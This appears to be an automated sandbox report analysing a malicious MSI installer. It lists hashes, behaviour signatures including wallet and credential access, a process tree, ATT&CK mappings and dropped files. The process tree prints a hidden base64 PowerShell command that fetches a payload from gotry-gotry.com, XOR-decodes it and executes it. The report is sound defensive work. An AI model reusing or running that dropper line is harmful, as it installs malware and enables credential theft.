Resubmissions

23-06-2024 14:14

240623-rj8ymsxdnn 10

17-06-2024 16:58

240617-vg68tazhkm 10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-06-2024 14:14

General

  • Target

    __x64___setup___x32__/setup.msi

  • Size

    25.2MB

  • MD5

    9e10d740b32cd15a4fb9a947f911b924

  • SHA1

    6ed60f2f79f986cbf4cc6ab1076522b9c762c272

  • SHA256

    ce35819b8e52f92738534f2b0c0d468bdade96eba64a41915618ab11c04c994a

  • SHA512

    d793f50e6a417a8c75da3a3e809c9cb2d2724d92600e994a90c4198f47937ad462d1682a5277fcb3f0d6648fee2511a2b43c96ff96e8e6a7bec4e461b6bd7a08

  • SSDEEP

    393216:o+OBUMu/xfGNU/6EiKJ5q7cPYALEUEZZ5XXMHjmPaKshz8Rk3KRrREZ78t0N:o+FMSuNCXFYHnbBXHaJ8a3wrREit0

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://gotry-gotry.com/2206s.bs64

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Downloads MZ/PE file
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 16 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32__\setup.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4148
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2592
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 599567E2D19B5DE421815FCCBBDDB416
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      PID:4808
    • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
      "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\"
      2⤵
      • Executes dropped EXE
      PID:1720
    • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
      "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4324
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe explorer.exe
        3⤵
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AZwBvAHQAcgB5AC0AZwBvAHQAcgB5AC4AYwBvAG0ALwAyADIAMAA2AHMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1580
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
            5⤵
            • Enumerates connected drives
            • Checks processor information in registry
            • Enumerates system info in registry
            • Modifies registry class
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:4988
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x364,0x7ffe61d22e98,0x7ffe61d22ea4,0x7ffe61d22eb0
              6⤵
                PID:4180
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2788 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:2
                6⤵
                  PID:1052
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2856 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:3
                  6⤵
                    PID:3928
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3028 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                    6⤵
                      PID:700
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3372 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:1
                      6⤵
                        PID:2180
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3440 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:1
                        6⤵
                          PID:3768
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3872 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:1
                          6⤵
                            PID:3356
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4920 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:2
                            6⤵
                              PID:4312
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5392 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:1
                              6⤵
                                PID:2516
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4788 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:1
                                6⤵
                                  PID:4472
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5420 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:1
                                  6⤵
                                    PID:2932
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5556 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                    6⤵
                                      PID:1556
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3940 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                      6⤵
                                        PID:4080
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=5952 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                        6⤵
                                          PID:768
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5860 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                          6⤵
                                            PID:1724
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=6008 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                            6⤵
                                              PID:4456
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6576 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:1
                                              6⤵
                                                PID:3780
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6820 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                                6⤵
                                                  PID:3200
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6820 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                                  6⤵
                                                    PID:4944
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4816 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:1
                                                    6⤵
                                                      PID:4480
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6856 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                                      6⤵
                                                        PID:5480
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6848 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                                        6⤵
                                                          PID:5488
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5404 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                                          6⤵
                                                            PID:5568
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6016 --field-trial-handle=2792,i,18358547534669490935,16768139896748312264,262144 --variations-seed-version /prefetch:8
                                                            6⤵
                                                              PID:5908
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EGCBFIEHIE.exe"
                                                          4⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2972
                                                          • C:\Users\Admin\AppData\Local\Temp\EGCBFIEHIE.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\EGCBFIEHIE.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:4240
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GIECFIEGDB.exe"
                                                          4⤵
                                                          • Checks computer location settings
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:3668
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1312 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
                                                    1⤵
                                                      PID:4424
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3000 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:3
                                                      1⤵
                                                        PID:1556
                                                      • C:\Windows\system32\AUDIODG.EXE
                                                        C:\Windows\system32\AUDIODG.EXE 0x49c 0x450
                                                        1⤵
                                                          PID:4528

                                                        Network

                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                        Execution

                                                        Command and Scripting Interpreter

                                                        1
                                                        T1059

                                                        PowerShell

                                                        1
                                                        T1059.001

                                                        Persistence

                                                        Event Triggered Execution

                                                        1
                                                        T1546

                                                        Installer Packages

                                                        1
                                                        T1546.016

                                                        Privilege Escalation

                                                        Event Triggered Execution

                                                        1
                                                        T1546

                                                        Installer Packages

                                                        1
                                                        T1546.016

                                                        Credential Access

                                                        Unsecured Credentials

                                                        1
                                                        T1552

                                                        Credentials In Files

                                                        1
                                                        T1552.001

                                                        Discovery

                                                        Query Registry

                                                        4
                                                        T1012

                                                        Peripheral Device Discovery

                                                        1
                                                        T1120

                                                        System Information Discovery

                                                        5
                                                        T1082

                                                        Collection

                                                        Data from Local System

                                                        1
                                                        T1005

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Config.Msi\e580156.rbs
                                                          Filesize

                                                          22KB

                                                          MD5

                                                          03435f13b29807c565acf91fdea07ebc

                                                          SHA1

                                                          ee740f555883a6fb5ba42ed9c071753e5968a0f5

                                                          SHA256

                                                          2ef5d7649b3d35f9fc5fd57e26d3a6cb7ce852ecd4139056a2ef91bb1a4a196a

                                                          SHA512

                                                          112b52061b8a6500dff2b2b527c327099ce7e030191acc4dc700165532744166a5d433e2b62fc7f16f60a7dcbec5d03c233b37493fb011e47e0d210b0aec4631

                                                        • C:\ProgramData\mozglue.dll
                                                          Filesize

                                                          593KB

                                                          MD5

                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                          SHA1

                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                          SHA256

                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                          SHA512

                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                        • C:\ProgramData\nss3.dll
                                                          Filesize

                                                          2.0MB

                                                          MD5

                                                          1cc453cdf74f31e4d913ff9c10acdde2

                                                          SHA1

                                                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                          SHA256

                                                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                          SHA512

                                                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                          Filesize

                                                          280B

                                                          MD5

                                                          756db89320fc7b43e038014d4d2f8cb1

                                                          SHA1

                                                          2bfc0a0df1076af327b8039772f3d132069483b2

                                                          SHA256

                                                          a5e80ac576b0e160b33a69f206802c4f2cd13751284528f148b7328bb4cf46c8

                                                          SHA512

                                                          8d715dc34334cec261688791642d9bbd5df4c77ec0a03af946ed62ea47e4986a471770750cccefc49741eead7cdf68e8454704574b5d5933de516174fd848d04

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                          Filesize

                                                          280B

                                                          MD5

                                                          04707de1faddc770a1b90e167ab6236f

                                                          SHA1

                                                          810817576da28ee68d41fd8935e05e738d9a4ba5

                                                          SHA256

                                                          4e5bc940b565e52131d82f8f53c7827b38d22192ebc66a98c038bc471282198d

                                                          SHA512

                                                          7546e110bd405e35d15439d120feaf82bf358738be1df34dab624df6af2239be9e8e3ce34828c994f8c202d7c2237b5648c1a32016470c4c66b4ef15de3ca05e

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                          Filesize

                                                          288B

                                                          MD5

                                                          1934c1f0fd58e1270c275661fc56d4da

                                                          SHA1

                                                          da241bcc895a2c04139d8b085b0042e3f5a2c50b

                                                          SHA256

                                                          8ab76f5b91f3f4472d01c421fe33c5d6c6b7284adb7902ee1d5bba2a794d93ce

                                                          SHA512

                                                          59ab8c5e700a6b030d932d29e9560b84d2790c9290dde6deec1a96b00e667842ea58ecd3756f0653b2a0316f15f1074fbc0cee9e28c756c5f6b96a80079f52f2

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
                                                          Filesize

                                                          2B

                                                          MD5

                                                          99914b932bd37a50b983c5e7c90ae93b

                                                          SHA1

                                                          bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                          SHA256

                                                          44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                          SHA512

                                                          27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\bnfacglegnmbliedmjpkbgpkfipgljph\CURRENT
                                                          Filesize

                                                          16B

                                                          MD5

                                                          46295cac801e5d4857d09837238a6394

                                                          SHA1

                                                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                          SHA256

                                                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                          SHA512

                                                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
                                                          Filesize

                                                          2KB

                                                          MD5

                                                          d7722759f52dd3387c1f3b5870e86d05

                                                          SHA1

                                                          bc124e9c018b5a3f5548c764f47cdeb397952a9e

                                                          SHA256

                                                          0d3b96d7326b80a4458d3c962e59753a9a2d1ee1eb5e155f5f9d60877dc12d43

                                                          SHA512

                                                          7e9111edb49f7189b4963558fd0e5eadfacaeced818abc0bdc9a7961d8d072e1a2082245f28474faadfcd62d6cbe765ba0e17fa50fccf2c8faad698a6e588018

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
                                                          Filesize

                                                          2B

                                                          MD5

                                                          d751713988987e9331980363e24189ce

                                                          SHA1

                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                          SHA256

                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                          SHA512

                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
                                                          Filesize

                                                          40B

                                                          MD5

                                                          20d4b8fa017a12a108c87f540836e250

                                                          SHA1

                                                          1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                          SHA256

                                                          6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                          SHA512

                                                          507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
                                                          Filesize

                                                          523B

                                                          MD5

                                                          91158e6de24b03eb8c905529417800a6

                                                          SHA1

                                                          8e79718b3ca5bc4a7fdd051cee3cb478b381339c

                                                          SHA256

                                                          26da14c5f5d03f005b402133ae37a936ec00630ab20d97b13c50e4480aef06e8

                                                          SHA512

                                                          b74340ba3d074c5d15e7b67b7b88c694da66188589cbcfd4e955c4f9014f3544c87e392f30eed58333a698b999430ea0947c765bc20f977e8f21be33cee5d3ae

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
                                                          Filesize

                                                          356B

                                                          MD5

                                                          7143e301c7ea5c56f008b09d6679c932

                                                          SHA1

                                                          fb62c34b20f4c79ab898ede7f56a13447f47f2a7

                                                          SHA256

                                                          ce697ebcdfa219b8b146dd57e73dde52a5d02644c0ee478ef0fd32d4cef97d52

                                                          SHA512

                                                          01b5b32940af49388d4a30b91ae3c7dd1af23b7bd1d9a6f66740caeb9759eba391fa6a12002fce4f3f2d81f303201a5ca9e2f96c678a18af170dc2b97f97faa0

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                          Filesize

                                                          10KB

                                                          MD5

                                                          cbf1fad180a2e30d7318270776581cdc

                                                          SHA1

                                                          a5f2db1ab5c8a4078526f7696ced4c3bd94dcbad

                                                          SHA256

                                                          4bf8eb66cf163b4809f30658dfd481a4ac23720cbd924e6369313750ebaba971

                                                          SHA512

                                                          ebfa21e0dda091969982ac9617205864435c10164f891ace463dd65d2483220034c6ea10dfebaaa11e6c407e94aff0e5b4dcc4b09d0ccbe196ffb80b213bb8e5

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                          Filesize

                                                          9KB

                                                          MD5

                                                          6843be4930a6b3dd265de6ea4d61c188

                                                          SHA1

                                                          5547d6099d50cceff03e031ea187a66b22c3aa7a

                                                          SHA256

                                                          efe90e561479150f22955d0c2776640456ce2e605e02ab36d9d5802cf7529be7

                                                          SHA512

                                                          473d00652494abef1131fc2e21a539c17fae4ffde6ff8b3cd8251acbbb2f828bf3bd1d21404eb2f0467252a43210143790ddd06c0818131d48cf74e5b566d768

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                          Filesize

                                                          10KB

                                                          MD5

                                                          ffb9daa7bfcdf0595bfc776fca4214a7

